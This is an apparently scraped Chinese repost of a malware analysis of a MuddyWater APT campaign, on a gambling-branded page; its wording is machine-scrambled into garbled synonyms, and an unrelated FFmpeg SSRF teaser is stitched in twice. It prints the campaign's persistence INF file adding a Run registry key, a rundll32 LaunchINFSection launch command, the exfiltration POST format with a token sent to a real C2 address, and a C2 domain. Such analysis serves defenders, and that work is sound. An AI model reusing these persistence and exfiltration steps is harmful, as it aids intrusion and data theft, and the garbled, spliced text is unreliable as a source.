Muddy Waters APT最新进击运动 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Muddy Waters APT最新进击运动

申博_新闻事件 申博 183次浏览 未收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

MuddyWater是一个伊朗的APT构造,从2017年最先活泼。近来,Check Point研究人员发明一同MuddyWater的新运动,被进击的目的有白俄罗斯、土耳其和乌克兰。

进击者运用的一个简朴而有用的沾染向量:鱼叉式垂纶进击。进击一样平常以一封发送给目的构造的邮件最先的,然后从被沾染的体系中盗取正当文档,再将改文档兵器化然后发送给其他潜伏的受害者。

为此须要建立一个诱运用户启用内容的钓饵信息,钓饵信息一样平常都含有实在公司或政府机构的logo。这些精心制作的社工歹意文档是酿成无文件沾染链的第一阶段,沾染链最终会通报一个署名PowerShell后门——POWERSTATS。该后门能够从进击者处吸收敕令,从体系中盗取文件、实行剧本、删除文件等等。

这些年来MuddyWater APT构造运用的战略、手艺和步调都在赓续地转变。在近来的进击运动中,研究人员发明一个并非用PowerShell编写的二阶段可实行文件。

样本

研究人员发明一个名为SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc的歹意word文档,翻译过去就是SPK(土耳其资本市场委员会)执法转变.doc。该文档含有宏,并经由过程展现土耳其文的钓饵信息诱使受害者启动内容。

· SHA-256: 2f77ec3dd5a5c8146213fdf6ac2df4a25a542cbd809689a5642954f2097e037a

配景中目次的图象含有看似正当的执法条文转变的形貌,图中单词下的红线显如今一个不支持土耳其语的情况中编纂:

图2: 在非土耳其语情况中建立的钓饵文档

沾染向量

若是受害者启用了歹意word文档中的宏,就会解码一个嵌入式payload,并以CiscoAny.exe的名字保存在%APPDATA%目次中。

可实行文件是用Delphi言语编写的,并用UPX打包,个中含有反剖析手艺:

除运转该可实行文件外,还会在雷同目次下建立一个名为CiscoTAP.inf的文件,文件内容以下:

[Version]
Signature=$CHICAGO$
[DefaultInstall]
AddReg=AddRegSection
[AddRegSection]
HKCU,Software\Microsoft\Windows\CurrentVersion\Run,CiscoAny,,”%APPDATA%\CiscoAny.exe”

然后实行以下敕令来运转payload:

“C:\Windows\System32\cmd.exe” /k rundll32.exe ieadvpack.dll,LaunchINFSection %APPDATA%\CiscoTAP.inf,,1,

由于敕令被加入到RUN注册表key中,这意味着可实行文件会在用户下次上岸后运转。IEAdvpack是一个Windows 8 DLL,该敕令在一些体系中是没法实行的,由于找不到DLL。INF文件在之前的MuddyWater进击运动中就被运用过了。

实行后,第一阶段会建立%APPDATA%\ID.dat文件,这是一个含有16个字符长的随机天生的受害者ID的文件:

 [UID]
ID=[VICTIM_ID]

然后,歹意软件会网络运转的体系中的信息,好比host name、运转的历程、物理内存、开机时候、运用的言语、公网IP地点等。网络的这些信息都回写入%APPDATA%\Info.txt文件中。

在网络数据以后,可实行文件会开释另一个可实行文件CiscoAny.exe,该文件是硬编码在resource中的,开释的地位为 %TEMP% 文件夹。第二个可实行文件也是用Delphi言语编写用UPX打包的:

末了,更新前面提到的ID.dat文件来注解沾染的第一阶段是胜利的:

[UID]
ID=[VICTIM_ID]
[STAGE]
ONE=SUC

第二阶段

第二个可实行文件起首搜检是不是联网。会发送一个到Google.com的要求,怎样衔接胜利,就复制之前建立的Info.txt文件的内容到%APPDATA%\[UNIQUE_ID].txt总。

图3:第二阶段指令

然后将网络的含有体系信息的文件POST到185.117.75[.]116.php:

—————————–[VICTIM_ID]
Content-Disposition: form-data; name=”g3t_f_465″; filename=”[UNIQUE_ID].txt”
Content-Type: application/octet-stream
[INFO.TXT CONTENT]
—————————–[VICTIM_ID]
Content-Disposition: form-data; name=”t0ken”
[email protected]
—————————–[VICTIM_ID]–

要求中的参数(g3t_f_465和t0ken) 是由嵌入在可实行文件中的TFRMMAIN resource中的TclHttpRequest 对象决议的:

FFmpeg HLS SSRF漏洞实例讲解

最近,我为一家著名的公司进行了一次安全测试。其中,有一个测试对象是用于youtube网站的音乐搜索、授权和管理平台。在测试过程中,我发现了一个表单,该表单是用于在用户的个人帐户中上传视频的。 但是,即使在上传视频这么简单的操作中

图3: 嵌入的设置装备摆设

另有一个含有受害者独一ID的要求会发送给googleads.hopto[.]org:

图6: C2通讯

来自C2的相应音讯会保存在%APPDATA%\temp.dat中,然后复制到%APPDATA%\Lib.ps1中。主可实行文件会延续搜检lib.ps1,然后实验实行个中的内容。

停止剖析时已没法猎取来自C2的相应,然则POWERSTATS是沾染的下一阶段的对象。

反剖析手艺

第一个可实行文件中运用的反剖析手艺异常有用,因而很难经由过程静态要领去剖析样本。殽杂要领建立了一个类似意大利面的代码,行将原始代码流分为多少小块,下一个指令的实在地位的动态盘算的。

下面是一个例子,盘算出下一个指令的地位,然后跳转(运用jmp或retn):

图7: 反剖析代码段

与MuddyWater异常类似

该文档和嵌入的宏含有一些特别字符串使研究人员觉得素昧平生。研究人员搜刮发明该文档在MuddyWater的进击运动中涌现过:

研究人员运用VBA2Graph对象来将每一个文档中宏的VBA挪用图形化显现,如许能够疾速发明这些文件的类似之处,好比函数名、参数名、解密要领和代码流。好比,研究人员就发明函数UFYYRJSFHX卖力将解码的payload写入文件体系中。

图8: Vba2graph图形干系

这些文档都是2019年天生的,然则末了2个含有2个名为F38HUYFLSF985HFUISHS和SSSDS98746GB函数,这两个函数在2018年11月MuddyWater进击运动中就最先运用了,因而研究人员预测这些进击运动中有某种联络:

图9: Vba2graph分歧进击运动之间的干系

MuddyWater分歧之处

夙昔面的剖析能够看出这些样本之间是有显着的联络的,然则也有一些分歧之处。好比,从表面来看,MuddyWater运用的文档一样平常含有一个英文的钓饵信息,而前面两个样本中是没有的,第三个样本运用的是土耳其语。

并且,若是对照分歧文档的宏,能够发明研究人员这个月发明的属于MuddyWater的样本在宏中运用了另一个函数定名要领(4个小写字母而不是大写字母和数字的组合):

图10: Vba2graph近来并行的进击运动

· SHA-256: 08e256cd2fa027552be253ec3bf427b537977f9123adf1f36e7cd2843a057554

这与研究人员之前发明的样本是分歧的,但在近几个月涌现的其他的MuddyWater样本中也涌现过:

图11: Vba2graph近来并行的进击运动

· SHA-256: 93b749082651d7fc0b3caa9df81bad7617b3bd4475de58acfe953dfafc7b3987

以上申明,进击者在同时并行提议进击运动,个中在进击的第一阶段最少运用了两个分歧的宏天生器。

结论

MuddyWater APT进击的如今之前重要在中东地区,包孕沙特阿拉伯、阿联酋和土耳其。如今进击的目的已扩大到了白俄罗斯和乌克兰。进击者还在赓续的转变其进击手艺和战略,但重要照样运用基于宏的歹意文档来流传歹意payload。研究人员还发明进击者在同时并行地提议多个进击运动。

FFmpeg HLS SSRF漏洞实例讲解

最近,我为一家著名的公司进行了一次安全测试。其中,有一个测试对象是用于youtube网站的音乐搜索、授权和管理平台。在测试过程中,我发现了一个表单,该表单是用于在用户的个人帐户中上传视频的。 但是,即使在上传视频这么简单的操作中


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Muddy Waters APT最新进击运动
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址